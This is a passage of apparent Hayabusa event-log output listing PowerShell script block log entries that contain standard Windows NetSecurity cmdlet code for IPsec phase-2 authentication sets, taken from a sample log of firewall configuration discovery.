[OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase2AuthSet.cmdletDefinition.cdxml-Help.xml }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.973 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Remove-NetIPsecPhase2AuthSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleEMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase2AuthSet.cmdletDefinition.cdxml-Help.xml }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.973 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Rename-NetIPsecPhase2AuthSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleEMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; 